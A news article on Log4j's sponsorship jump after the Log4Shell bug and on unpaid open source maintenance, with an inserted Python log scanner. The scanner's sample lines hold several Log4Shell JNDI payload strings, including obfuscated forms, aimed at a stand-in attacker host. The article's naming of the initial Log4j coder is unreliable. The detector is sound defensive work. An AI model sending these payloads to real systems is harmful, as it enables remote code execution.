Log4j's project sponsorship skyrockets after critical bug exploitation


Demanding work done for free not sustainable.

The maintainers of the Java Log4j project had only three sponsors, despite the software being a crucial part of large companies' commercial products and enterprise applications.

Roger Goers, the initial Log4j coder and a member of the Apache Software Foundation, now has 58 mostly individual sponsors at the time of publishing.

Log4j is a popular logging library for Java. The critical bug stems from its handling of lookups embedded in logged strings: a JNDI (Java Naming and Directory Interface) lookup placed in attacker-controlled input, such as a request header, was resolved by the library, allowing the remote execution of arbitrary code in the default configuration of affected versions.
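To make the lookup behaviour described above concrete, here is an added example (written for this article, not code from Log4j or its maintainers): a small Python scanner that peels away the nested-lookup obfuscations seen in exploit attempts and flags log lines that still carry a "${jndi:" lookup. The access-log lines are constructed, the IP addresses come from documentation ranges, and the handled lookup forms (lower, upper and the ":-" default syntax) are the subset of Log4j's substitution syntax I assume an attacker would use to hide the word "jndi".

```python
import re

# Innermost ${...} lookup: a body with no nested braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# What we are ultimately looking for once obfuscation is peeled away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve_inner(m):
    """Rewrite one innermost lookup the way Log4j's string substitution would,
    for the handful of lookup forms attackers use to hide the word 'jndi'."""
    body = m.group(1)
    low = body.lower()
    if low.startswith("jndi:"):
        return m.group(0)  # the payload itself: never rewrite it
    if low.startswith("lower:"):
        return body[len("lower:"):].lower()
    if low.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default}: an unresolvable key (e.g. ${::-j} or ${env:NOPE:-j})
        # substitutes the default text.
        return body.split(":-", 1)[1]
    return m.group(0)  # any other lookup (date, env without default, ...) is left alone


def normalize_lookups(text, max_rounds=20):
    """Repeatedly resolve innermost lookups until nothing changes.
    max_rounds bounds the work on pathological input (assumption: 20 levels
    of nesting is far more than real exploit strings use)."""
    for _ in range(max_rounds):
        rewritten = _INNER.sub(_resolve_inner, text)
        if rewritten == text:
            break
        text = rewritten
    return text


def scan_log_lines(lines):
    """Return (line_number, normalized_line) for every line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        if _JNDI.search(normalized):
            hits.append((number, normalized))
    return hits


# Constructed access-log lines (documentation IP ranges, not real traffic).
# Lines 1-5 carry a JNDI lookup in the User-Agent field; 6 and 7 are benign.
SAMPLE_LINES = [
    '203.0.113.5 - - [10/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:10:01:03 +0000] "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:ldap://198.51.100.7:1389/b}"',
    '203.0.113.5 - - [10/Dec/2021:10:01:04 +0000] "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7:1099/c}"',
    '203.0.113.5 - - [10/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 "-" "${${env:BARFOO:-j}ndi${env:BARFOO:-:}ldap://198.51.100.7:1389/d}"',
    '203.0.113.5 - - [10/Dec/2021:10:01:06 +0000] "GET / HTTP/1.1" 200 "-" "${${upper:${lower:J}}${::-ndi}:dns://198.51.100.7/e}"',
    '203.0.113.9 - - [10/Dec/2021:10:02:00 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:02:01 +0000] "GET /docs/jndi-tutorial.html HTTP/1.1" 200 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for number, normalized in scan_log_lines(SAMPLE_LINES):
        print(f"line {number}: {normalized}")
```

Treat this as a triage aid rather than a control: it only handles the lookup forms listed above, the word "jndi" alone is not a hit (line 7 shows a benign URL that contains it), and nothing a log scanner finds changes the fact that the fix is to run a patched Log4j release.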

Poor funding is an ongoing problem with free open source software (FOSS), with developers expected to commit to years of unpaid work of ever-increasing complexity, a situation that they say is unsustainable.

Christine Dodrill, a developer working on WebAssembly, a portable binary format for programs that can run in web pages, said the situation is so bad that she is very careful about how she codes software and releases it to the world.

"No offense, but I really do not want to go unpaid for my efforts," Dodrill wrote.

"The existing leech culture of open source being a pool of free labour makes it hard for me to want to have my side projects be actually useful like that unless you pay me."

Others such as Java luminary Mark Derricutt agree, and say organisations should change their mindsets, and consider funded and not free open source software.

"I'd say the... funding for a lot of open source [projects] is woefully low," Derricutt said.

Google Go developer and cryptographer Filippo Valsorda pointed out that the work of open source project maintainers is complex and demanding, and that it's not fair to demand it be done without payment.

Valsorda estimated that many developers of popular open source projects would be paid salaries in the US$350,000 range working as senior software developers.

Currently, many open source developers receive funding through donations, but this is not a good long-term solution, Valsorda said. Neither is being employed as a full-time maintainer at a big company, where a developer may end up spending more and more time proving that the work they do is important rather than just doing it.

Instead, Valsorda suggests maintainers should become professionalised, sending big companies suitably large invoices for their work as this is a model that enterprises understand, unlike donation-based funding.

Many developers are unable to continue their work maintaining and updating the software they've written, which could lead to security issues that might not get fixed in a timely fashion.

In 2018, a JavaScript module developer gave up on an npm package as it was no fun to work on for free, and handed it off to an unknown person.

The unknown person who took over as project maintainer added malicious code to the npm package that stole users' Bitcoin wallets.

At the time, Dominic Tarr, who originally developed the npm package, told iTnews the open source model was broken and that maintainers needed to get paid for their work.

"When millions of people depend on something that the original author has very little motivation to maintain, that's insane," Tarr said.

Copyright © iTnews.com.au . All rights reserved.